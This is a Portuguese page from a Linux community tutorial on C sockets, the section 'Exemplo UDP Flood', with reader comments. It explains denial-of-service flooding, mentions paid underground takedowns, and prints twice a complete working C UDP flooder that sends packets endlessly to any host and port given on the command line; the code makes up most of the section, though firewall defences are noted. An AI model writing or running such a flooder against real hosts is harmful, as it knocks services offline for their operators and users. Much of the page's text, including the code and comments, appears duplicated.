BSD Sockets em linguagem C
Venho neste artigo explicar como funciona sockets em ANSi C, explicar portabilidade e exemplos reais e diferentes de artigos semelhantes. Enfim, aqui você aprenderá a usar sockets na prática.
[ Hits: 122.039 ]
Por: C00L3R_ em 06/07/2010 | Blog: https://github.com/CoolerVoid
Exemplo UDP Flood
Bom, UDP flood seria Denial of Service ou DoS, é um ataque de negação de serviço. Basicamente é quando você sobrecarrega uma determinada rede a ponto de que ela se torne inacessível, ou seja, você iria derrubar esta rede.
Você pode floodar com pacotes SYN, UDP, ACK... uma determinada porta a fim de derrubar a rede. No nosso caso vamos usar UDP no IRC, o público underground fala pacotar servidor X, assim evita falar "vamos floodar para derrubar tal servidor", tem outras gírias como "picar o rodo já que não deu nada", pessoal faz muito isso, é pago para fazer um serviço, não conseguiu fazer nenhum estrago, então simplesmente derruba o host.
Lembrando aí que ataques UDP já tem muitos routers que tem proteção para o mesmo, IPtables do Linux tem uma configuração para fazer isso, o packet filter dos *BSD também não é muito difícil, qualquer firewall dá block neste tipo de ataque, desde que seja configurado...
Vamos ao exemplo, está com linhas comentadas.
#include "stdlib.h"
#include "string.h"
#include "netdb.h"
#include "stdarg.h"
#include "sys/param.h"
#include "sys/socket.h"
#include "netinet/in.h"
#define STRING "ola"
#define SIZE 50
int conecta(char *, short);
int conecta(char *server, short port) {
struct sockaddr_in sin;
struct hostent *host;
int sock;
host = gethostbyname(server);
if (host==NULL) {
printf(" host: %s invalido\n",server);
exit(0);
}
printf(" --> pacotando %s:%d\n ", server, port);
// setamos tudo para zero velho clichê blabla
bzero((char*) &sin,sizeof(sin));
bcopy(host->h_addr, (char *) &sin.sin_addr, host->h_length);
sin.sin_family = host->h_addrtype;
sin.sin_port = htons(port);
// olhe nosso dgram
sock = socket(AF_INET, SOCK_DGRAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
return sock;
}
main(int argc, char **argv) {
int var;
if(argc != 3) {
fprintf(stderr, "\nUDP Flooder by Cooler_\nSiga o exemplo: %s host port\n",argv[0]);
exit(0);
}
var=conecta(argv[1], atoi(argv[2]));
//loop infinito
for(;;) {
// passamos a palavra a floodar e o seu tamanho
send(var, STRING, SIZE, 0);
}
}
Bom, o assunto de UDP fica por aqui, praticamente acabou nossa aventura.
Você pode floodar com pacotes SYN, UDP, ACK... uma determinada porta a fim de derrubar a rede. No nosso caso vamos usar UDP no IRC, o público underground fala pacotar servidor X, assim evita falar "vamos floodar para derrubar tal servidor", tem outras gírias como "picar o rodo já que não deu nada", pessoal faz muito isso, é pago para fazer um serviço, não conseguiu fazer nenhum estrago, então simplesmente derruba o host.
Lembrando aí que ataques UDP já tem muitos routers que tem proteção para o mesmo, IPtables do Linux tem uma configuração para fazer isso, o packet filter dos *BSD também não é muito difícil, qualquer firewall dá block neste tipo de ataque, desde que seja configurado...
Vamos ao exemplo, está com linhas comentadas.
/*
GarageCode coolest things Hehehe
http://GarageCode.tk
*Function this programm
this is a UDP flooder,i make it to study Sockets
*tested with GCC
i wheel on Unix/Linux/BSD this:
gcc -o program program.c; ./program host port
Author: "Cooler_"
contact: tony.unix@yahoo.com.br or c00f3r@gmail.com
license: GPL2
visit this site: http://BotecoUnix.com.br
Real Geeks BotecoUnix
greetz
Thanks _mlk_ , m0nad,IAK,Fox,edenc,D3lf0,zepplin and f0kerdebug.
,;~;,
/\_
( /
(()| //)
| \\ ,,;;'\ GAME OVER
__ _( )m=(((((((((((((================--------
/' ' '()/~' '.(, |
,;( )|| | ~
,;' \ /-(.;, ))
) / / ) //
// \\ |||
)_\ )_\ )_\\
*/
#include "stdio.h"#include "stdlib.h"
#include "string.h"
#include "netdb.h"
#include "stdarg.h"
#include "sys/param.h"
#include "sys/socket.h"
#include "netinet/in.h"
#define STRING "ola"
#define SIZE 50
int conecta(char *, short);
int conecta(char *server, short port) {
struct sockaddr_in sin;
struct hostent *host;
int sock;
host = gethostbyname(server);
if (host==NULL) {
printf(" host: %s invalido\n",server);
exit(0);
}
printf(" --> pacotando %s:%d\n ", server, port);
// setamos tudo para zero velho clichê blabla
bzero((char*) &sin,sizeof(sin));
bcopy(host->h_addr, (char *) &sin.sin_addr, host->h_length);
sin.sin_family = host->h_addrtype;
sin.sin_port = htons(port);
// olhe nosso dgram
sock = socket(AF_INET, SOCK_DGRAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
return sock;
}
main(int argc, char **argv) {
int var;
if(argc != 3) {
fprintf(stderr, "\nUDP Flooder by Cooler_\nSiga o exemplo: %s host port\n",argv[0]);
exit(0);
}
var=conecta(argv[1], atoi(argv[2]));
//loop infinito
for(;;) {
// passamos a palavra a floodar e o seu tamanho
send(var, STRING, SIZE, 0);
}
}
Bom, o assunto de UDP fica por aqui, praticamente acabou nossa aventura.
Páginas do artigo
1. Introdução 2. Explanação ao TCP/IP
3. O que é socket
4. Funções read(), send() e exemplo cliente HTTP
5. Funções listen(), bind(), accept() e exemplo de servidor HTTP
6. Na prática fazendo um FUZZER TCP
7. Servidor e cliente com fork
8. Servidor de comandos e scanner de portas
9. Simple socket library
10. Explanação ao UDP e exemplo de servidor e cliente
11. Exemplo UDP Flood
12. Portabilidade
13. Conclusão
Outros artigos deste autor
Ponteiros - Saindo de Pesadelos
Buffer Overflow: Entendendo e explorando
Leitura recomendada
Monitorando o consumo de banda com Bwbar
Tutorial - Aplicação em C para transferência de arquivo usando socket TCP e Thread
Criação e uso de um interpretador de script BrainFuck em C++
Comentários
[2] Comentário enviado por removido em 06/07/2010 - 05:29h
Hey C00L3R,
Parabéns, é um ótimo artigo. Minhas dúvidas surgiram após meus testes.
Um abraço.
Hey C00L3R,
Parabéns, é um ótimo artigo. Minhas dúvidas surgiram após meus testes.
Um abraço.
[3] Comentário enviado por andrezc em 06/07/2010 - 08:12h
Cara, realmente esse é um dos melhores artigos que eu já li por aqui. Parabéns.
Cara, realmente esse é um dos melhores artigos que eu já li por aqui. Parabéns.
[5] Comentário enviado por uberalles em 06/07/2010 - 11:43h
verdadeira aula, velho. parabéns!
muito bom "resumão" do Unix Network programming. Nunca consegui fazer nada decente em sockets e esta tua aula deverá me ajudar muito.
verdadeira aula, velho. parabéns!
muito bom "resumão" do Unix Network programming. Nunca consegui fazer nada decente em sockets e esta tua aula deverá me ajudar muito.
[6] Comentário enviado por stremer em 07/07/2010 - 15:28h
para quem interessar, ha algum tempo atras escrevi um script mostrando como criar um robo http e enviei ao VOL.
http://www.vivaolinux.com.br/script/Robo-HTTP-usando-socket-e-codigo-multiplataforma
Interessante para quem esta aprendendo sockets...
OTIMO ARTIGO
para quem interessar, ha algum tempo atras escrevi um script mostrando como criar um robo http e enviei ao VOL.
http://www.vivaolinux.com.br/script/Robo-HTTP-usando-socket-e-codigo-multiplataforma
Interessante para quem esta aprendendo sockets...
OTIMO ARTIGO
[7] Comentário enviado por andrezc em 07/07/2010 - 15:43h
Opa stremer, eu cheguei a ver este seu script, realmente fabuloso.
Um abraço.
Opa stremer, eu cheguei a ver este seu script, realmente fabuloso.
Um abraço.
[9] Comentário enviado por brunosolar em 08/07/2010 - 09:48h
Parabens realmente muito bom. So queria fazer um comentario sobra a parte do UDP flood. Sim hoje em dia qualquer firewal simples pode recusar este tipo de pacote.
No entanto dependendo da quantidade de pacotes UDP enviados (leia-se DDOS) você poderá ser "derrubado" pois o firewall irá gastar muito processador para descatar todos os pacotes. A melhor solução (AINDA) para ataques DOS / DDOS é diretamente no ISP onde eles irão setar no roteador o IP do atacante para /dev/null (exemplo). claro que voce corre o risco de perder algum cliente que faça parte da rede redirecionada.
No mais excelente trabalho.
Parabens realmente muito bom. So queria fazer um comentario sobra a parte do UDP flood. Sim hoje em dia qualquer firewal simples pode recusar este tipo de pacote.
No entanto dependendo da quantidade de pacotes UDP enviados (leia-se DDOS) você poderá ser "derrubado" pois o firewall irá gastar muito processador para descatar todos os pacotes. A melhor solução (AINDA) para ataques DOS / DDOS é diretamente no ISP onde eles irão setar no roteador o IP do atacante para /dev/null (exemplo). claro que voce corre o risco de perder algum cliente que faça parte da rede redirecionada.
No mais excelente trabalho.
[10] Comentário enviado por shazaum em 24/09/2010 - 11:44h
opa, no fuzzer faltou uma lib...
#include <netinet/in.h>
opa, no fuzzer faltou uma lib...
#include <netinet/in.h>
[11] Comentário enviado por thomasawrd em 18/07/2014 - 12:41h
parabéns cara excelente artigo,me ajudou muito.
parabéns cara excelente artigo,me ajudou muito.
Patrocínio
Site hospedado pelo provedor RedeHost.
Destaques
Artigos
Como atualizar sua versão estável do Debian
Cirurgia para acelerar o openSUSE em HD externo via USB
Void Server como Domain Control
Dicas
Script de montagem de chroot automatica
Atualizar Linux Mint 22.2 para 22.3 beta
Jogar games da Battle.net no Linux com Faugus Launcher
Como fazer a Instalação de aplicativos para acesso remoto ao Linux
Tópicos
Instalar Dual Boot, Linux+Windows. (6)
Conky, alerta de temperatura alta (17)
De volta para o futuro - ou melhor, para o presente (parte 2) (3)
Top 10 do mês
-
Xerxes
1° lugar - 147.980 pts -
Fábio Berbert de Paula
2° lugar - 66.667 pts -
Buckminster
3° lugar - 22.499 pts -
Mauricio Ferrari
4° lugar - 20.762 pts -
Alberto Federman Neto.
5° lugar - 19.979 pts -
edps
6° lugar - 18.722 pts -
Daniel Lara Souza
7° lugar - 17.870 pts -
Andre (pinduvoz)
8° lugar - 16.436 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 15.695 pts -
Jesuilton Montalvão
10° lugar - 15.018 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
